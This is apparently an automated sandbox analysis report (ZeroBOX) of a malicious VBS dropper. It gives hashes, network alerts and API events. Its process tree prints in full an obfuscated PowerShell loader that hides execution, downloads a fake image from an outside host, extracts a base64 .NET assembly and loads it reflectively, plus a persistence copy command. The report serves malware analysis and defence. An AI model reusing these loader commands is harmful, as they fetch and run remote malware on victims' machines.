Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Oct. 26, 2023, 5:18 p.m.	Oct. 26, 2023, 5:20 p.m.

Size	275.8KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`b70068430fab03962b3fe2d15588c894`
SHA256	`8a38e1eae21dc4a5c8730fe252b518f817d22f4304dc4857592c7e7c9ebc42e8`
CRC32	`D8873898`
ssdeep	`3072:FyYdYjYMYiht0W6dI2mNnGt6V+wHt0btbg6Ub8uq9Vt06+HJHiaTpqfhH0zzKkmK:F9+`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\HTMLcachesIE.vbs
2996
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVQByUHOWdGtçceGwUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBoUHOWdGtçceHQUHOWdGtçcedUHOWdGtçceBwUHOWdGtçceHMUHOWdGtçceOgUHOWdGtçcevUHOWdGtçceC8UHOWdGtçcedQBwUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBuUHOWdGtçceHMUHOWdGtçceLgBjUHOWdGtçceG8UHOWdGtçcebQUHOWdGtçceuUHOWdGtçceGIUHOWdGtçcecgUHOWdGtçcevUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBzUHOWdGtçceC8UHOWdGtçceMUHOWdGtçceUHOWdGtçcewUHOWdGtçceDQUHOWdGtçceLwUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceNUHOWdGtçceUHOWdGtçcevUHOWdGtçceDcUHOWdGtçceNUHOWdGtçceUHOWdGtçce5UHOWdGtçceC8UHOWdGtçcebwByUHOWdGtçceGkUHOWdGtçceZwBpUHOWdGtçceG4UHOWdGtçceYQBsUHOWdGtçceC8UHOWdGtçcebgBlUHOWdGtçceHcUHOWdGtçceXwBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceLgBqUHOWdGtçceHUHOWdGtçceUHOWdGtçceZwUHOWdGtçce/UHOWdGtçceDEUHOWdGtçceNgUHOWdGtçce5UHOWdGtçceDgUHOWdGtçceMUHOWdGtçceUHOWdGtçce4UHOWdGtçceDQUHOWdGtçceNQUHOWdGtçceyUHOWdGtçceDMUHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcedwBlUHOWdGtçceGIUHOWdGtçceQwBsUHOWdGtçceGkUHOWdGtçceZQBuUHOWdGtçceHQUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceTgBlUHOWdGtçceHcUHOWdGtçceLQBPUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceTgBlUHOWdGtçceHQUHOWdGtçceLgBXUHOWdGtçceGUUHOWdGtçceYgBDUHOWdGtçceGwUHOWdGtçceaQBlUHOWdGtçceG4UHOWdGtçcedUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceHcUHOWdGtçceZQBiUHOWdGtçceEMUHOWdGtçcebUHOWdGtçceBpUHOWdGtçceGUUHOWdGtçcebgB0UHOWdGtçceC4UHOWdGtçceRUHOWdGtçceBvUHOWdGtçceHcUHOWdGtçcebgBsUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceEQUHOWdGtçceYQB0UHOWdGtçceGEUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBVUHOWdGtçceHIUHOWdGtçcebUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBpUHOWdGtçceG0UHOWdGtçceYQBnUHOWdGtçceGUUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceVUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçcedUHOWdGtçceUHOWdGtçceuUHOWdGtçceEUUHOWdGtçcebgBjUHOWdGtçceG8UHOWdGtçceZUHOWdGtçceBpUHOWdGtçceG4UHOWdGtçceZwBdUHOWdGtçceDoUHOWdGtçceOgBVUHOWdGtçceFQUHOWdGtçceRgUHOWdGtçce4UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceUwB0UHOWdGtçceHIUHOWdGtçceaQBuUHOWdGtçceGcUHOWdGtçceKUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBCUHOWdGtçceHkUHOWdGtçcedUHOWdGtçceBlUHOWdGtçceHMUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBTUHOWdGtçceFQUHOWdGtçceQQBSUHOWdGtçceFQUHOWdGtçcePgUHOWdGtçce+UHOWdGtçceCcUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGUUHOWdGtçcebgBkUHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce8UHOWdGtçceDwUHOWdGtçceQgBBUHOWdGtçceFMUHOWdGtçceRQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceXwBFUHOWdGtçceE4UHOWdGtçceRUHOWdGtçceUHOWdGtçce+UHOWdGtçceD4UHOWdGtçceJwUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceUHOWdGtçcekUHOWdGtçceGkUHOWdGtçcebQBhUHOWdGtçceGcUHOWdGtçceZQBUUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceB0UHOWdGtçceC4UHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceE8UHOWdGtçceZgUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceKQUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceZQBuUHOWdGtçceGQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceTwBmUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBGUHOWdGtçceGwUHOWdGtçceYQBnUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceHMUHOWdGtçcedUHOWdGtçceBhUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçceZQUHOWdGtçcegUHOWdGtçceDUHOWdGtçceUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceGcUHOWdGtçcedUHOWdGtçceUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcegUHOWdGtçceCsUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEYUHOWdGtçcebUHOWdGtçceBhUHOWdGtçceGcUHOWdGtçceLgBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçce7UHOWdGtçceCQUHOWdGtçceYgBhUHOWdGtçceHMUHOWdGtçceZQUHOWdGtçce2UHOWdGtçceDQUHOWdGtçceTUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZwB0UHOWdGtçceGgUHOWdGtçceIUHOWdGtçceUHOWdGtçce9UHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBlUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBJUHOWdGtçceG4UHOWdGtçceZUHOWdGtçceBlUHOWdGtçceHgUHOWdGtçceIUHOWdGtçceUHOWdGtçcetUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBzUHOWdGtçceHQUHOWdGtçceYQByUHOWdGtçceHQUHOWdGtçceSQBuUHOWdGtçceGQUHOWdGtçceZQB4UHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçceaQBtUHOWdGtçceGEUHOWdGtçceZwBlUHOWdGtçceFQUHOWdGtçceZQB4UHOWdGtçceHQUHOWdGtçceLgBTUHOWdGtçceHUUHOWdGtçceYgBzUHOWdGtçceHQUHOWdGtçcecgBpUHOWdGtçceG4UHOWdGtçceZwUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcecwB0UHOWdGtçceGEUHOWdGtçcecgB0UHOWdGtçceEkUHOWdGtçcebgBkUHOWdGtçceGUUHOWdGtçceeUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBMUHOWdGtçceGUUHOWdGtçcebgBnUHOWdGtçceHQUHOWdGtçceaUHOWdGtçceUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceQwBvUHOWdGtçceG4UHOWdGtçcedgBlUHOWdGtçceHIUHOWdGtçcedUHOWdGtçceBdUHOWdGtçceDoUHOWdGtçceOgBGUHOWdGtçceHIUHOWdGtçcebwBtUHOWdGtçceEIUHOWdGtçceYQBzUHOWdGtçceGUUHOWdGtçceNgUHOWdGtçce0UHOWdGtçceFMUHOWdGtçcedUHOWdGtçceByUHOWdGtçceGkUHOWdGtçcebgBnUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBiUHOWdGtçceGEUHOWdGtçcecwBlUHOWdGtçceDYUHOWdGtçceNUHOWdGtçceBDUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceGwUHOWdGtçcebwBhUHOWdGtçceGQUHOWdGtçceZQBkUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQUHOWdGtçcegUHOWdGtçceD0UHOWdGtçceIUHOWdGtçceBbUHOWdGtçceFMUHOWdGtçceeQBzUHOWdGtçceHQUHOWdGtçceZQBtUHOWdGtçceC4UHOWdGtçceUgBlUHOWdGtçceGYUHOWdGtçcebUHOWdGtçceBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBpUHOWdGtçceG8UHOWdGtçcebgUHOWdGtçceuUHOWdGtçceEEUHOWdGtçcecwBzUHOWdGtçceGUUHOWdGtçcebQBiUHOWdGtçceGwUHOWdGtçceeQBdUHOWdGtçceDoUHOWdGtçceOgBMUHOWdGtçceG8UHOWdGtçceYQBkUHOWdGtçceCgUHOWdGtçceJUHOWdGtçceBjUHOWdGtçceG8UHOWdGtçcebQBtUHOWdGtçceGEUHOWdGtçcebgBkUHOWdGtçceEIUHOWdGtçceeQB0UHOWdGtçceGUUHOWdGtçcecwUHOWdGtçcepUHOWdGtçceDsUHOWdGtçceJUHOWdGtçceB0UHOWdGtçceHkUHOWdGtçcecUHOWdGtçceBlUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcebUHOWdGtçceBvUHOWdGtçceGEUHOWdGtçceZUHOWdGtçceBlUHOWdGtçceGQUHOWdGtçceQQBzUHOWdGtçceHMUHOWdGtçceZQBtUHOWdGtçceGIUHOWdGtçcebUHOWdGtçceB5UHOWdGtçceC4UHOWdGtçceRwBlUHOWdGtçceHQUHOWdGtçceVUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCcUHOWdGtçceRgBpUHOWdGtçceGIUHOWdGtçceZQByUHOWdGtçceC4UHOWdGtçceSUHOWdGtçceBvUHOWdGtçceG0UHOWdGtçceZQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceOwUHOWdGtçcekUHOWdGtçceG0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCUHOWdGtçceUHOWdGtçcePQUHOWdGtçcegUHOWdGtçceCQUHOWdGtçcedUHOWdGtçceB5UHOWdGtçceHUHOWdGtçceUHOWdGtçceZQUHOWdGtçceuUHOWdGtçceEcUHOWdGtçceZQB0UHOWdGtçceE0UHOWdGtçceZQB0UHOWdGtçceGgUHOWdGtçcebwBkUHOWdGtçceCgUHOWdGtçceJwBWUHOWdGtçceEEUHOWdGtçceSQUHOWdGtçcenUHOWdGtçceCkUHOWdGtçceLgBJUHOWdGtçceG4UHOWdGtçcedgBvUHOWdGtçceGsUHOWdGtçceZQUHOWdGtçceoUHOWdGtçceCQUHOWdGtçcebgB1UHOWdGtçceGwUHOWdGtçcebUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceWwBvUHOWdGtçceGIUHOWdGtçceagBlUHOWdGtçceGMUHOWdGtçcedUHOWdGtçceBbUHOWdGtçceF0UHOWdGtçceXQUHOWdGtçcegUHOWdGtçceCgUHOWdGtçceJwBkUHOWdGtçceEgUHOWdGtçceaUHOWdGtçceUHOWdGtçcewUHOWdGtçceEwUHOWdGtçcebUHOWdGtçceBKUHOWdGtçceFUUHOWdGtçceUwBDUHOWdGtçceDkUHOWdGtçceegBkUHOWdGtçceDIUHOWdGtçceOQBrUHOWdGtçceGIUHOWdGtçcebQBsUHOWdGtçceDMUHOWdGtçceTUHOWdGtçceB6UHOWdGtçceFEUHOWdGtçceMQBNUHOWdGtçceFMUHOWdGtçceNUHOWdGtçceUHOWdGtçcewUHOWdGtçceE4UHOWdGtçceaQUHOWdGtçce0UHOWdGtçceHoUHOWdGtçceTUHOWdGtçceBqUHOWdGtçceEkUHOWdGtçceNQBNUHOWdGtçceFMUHOWdGtçceOUHOWdGtçceB2UHOWdGtçceE8UHOWdGtçcebgBCUHOWdGtçceDUHOWdGtçceUHOWdGtçceZUHOWdGtçceBHUHOWdGtçceGcUHOWdGtçcePQUHOWdGtçcenUHOWdGtçceCUHOWdGtçceUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceDIUHOWdGtçceJwUHOWdGtçcegUHOWdGtçceCwUHOWdGtçceIUHOWdGtçceUHOWdGtçcenUHOWdGtçceHIUHOWdGtçceZQBnUHOWdGtçceGEUHOWdGtçcecwBtUHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwUHOWdGtçce1UHOWdGtçceCcUHOWdGtçceIUHOWdGtçceUHOWdGtçcesUHOWdGtçceCUHOWdGtçceUHOWdGtçceJwBDUHOWdGtçceDoUHOWdGtçceXUHOWdGtçceBXUHOWdGtçceGkUHOWdGtçcebgBkUHOWdGtçceG8UHOWdGtçcedwBzUHOWdGtçceFwUHOWdGtçceVUHOWdGtçceBlUHOWdGtçceG0UHOWdGtçcecUHOWdGtçceBcUHOWdGtçceCcUHOWdGtçceLUHOWdGtçceUHOWdGtçcegUHOWdGtçceCcUHOWdGtçceaUHOWdGtçceB0UHOWdGtçceG0UHOWdGtçcebUHOWdGtçceBjUHOWdGtçceCcUHOWdGtçceKQUHOWdGtçcepUHOWdGtçceUHOWdGtçce==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('UHOWdGtçce','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
  932
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40Ni4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc'))"
    2476
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden if (-not (Get-ChildItem C:\Windows\Temp\*.vbs)) { Copy-Item -Path *.vbs -Destination C:\Windows\Temp\regasm.vbs -Force }
  2228

Name	Response	Post-Analysis Lookup
apps.identrust.com	A 23.67.53.27 A 23.67.53.17 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net	23.67.53.27
uploaddeimagens.com.br	A 104.21.45.138 A 172.67.215.45	104.21.45.138

IP Address	Status	Action
104.21.45.138	Active	Moloch
164.124.101.2	Active	Moloch
23.67.53.17	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49166 -> 104.21.45.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49166 104.21.45.138:443	C=US, O=Let's Encrypt, CN=E1	CN=uploaddeimagens.com.br	d4:47:9f:16:cd:db:0a:99:1e:d8:a8:20:24:9b:c9:bb:4c:62:39:71

Queries for the computername (19 events)

Time & API	Arguments	Status	Return
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Oct. 26, 2023, 5:18 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 26, 2023, 5:18 p.m.			0	0
IsDebuggerPresent Oct. 26, 2023, 5:18 p.m.			0	0
IsDebuggerPresent Oct. 26, 2023, 5:18 p.m.			0	0

Command line console output was observed (50 out of 140 events)

Time & API	Arguments	Status	Return
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti console_handle: 0x00000023	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: on was closed: Could not establish trust relationship for the SSL/TLS secure ch console_handle: 0x0000002f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: annel." console_handle: 0x0000003b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: At line:1 char:181 console_handle: 0x00000047	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i console_handle: 0x00000053	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000005f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $webClient.DownloadData <<<< ($imageUrl);$imageText = [System.Text.Encoding]:: console_handle: 0x0000006b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6 console_handle: 0x00000077	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In console_handle: 0x00000083	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000008f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x0000009b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x000000a7	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x000000b3	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x000000bf	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N console_handle: 0x000000cb	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc') console_handle: 0x000000d7	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000ef	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000000fb	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null. console_handle: 0x0000011b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: Parameter name: bytes" console_handle: 0x00000127	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: At line:1 char:244 console_handle: 0x00000133	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + $imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_i console_handle: 0x0000013f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: mage.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = console_handle: 0x0000014b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.G console_handle: 0x00000157	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: etString <<<< ($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE6 console_handle: 0x00000163	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: 4_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.In console_handle: 0x0000016f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: dexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += console_handle: 0x0000017b	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $im console_handle: 0x00000187	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]: console_handle: 0x00000193	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: :FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly console_handle: 0x0000019f	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: ]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = console_handle: 0x000001ab	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LlJUSC9zd29kbml3LzQ1MS40N console_handle: 0x000001b7	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: i4zLjI5MS8vOnB0dGg=' , '' , '2' , 'regasm' , '5' , 'C:\Windows\Temp\', 'htmlc') console_handle: 0x000001c3	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000001db	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x000001e7	1	1
WriteConsoleW Oct. 26, 2023, 5:18 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000207	1	1
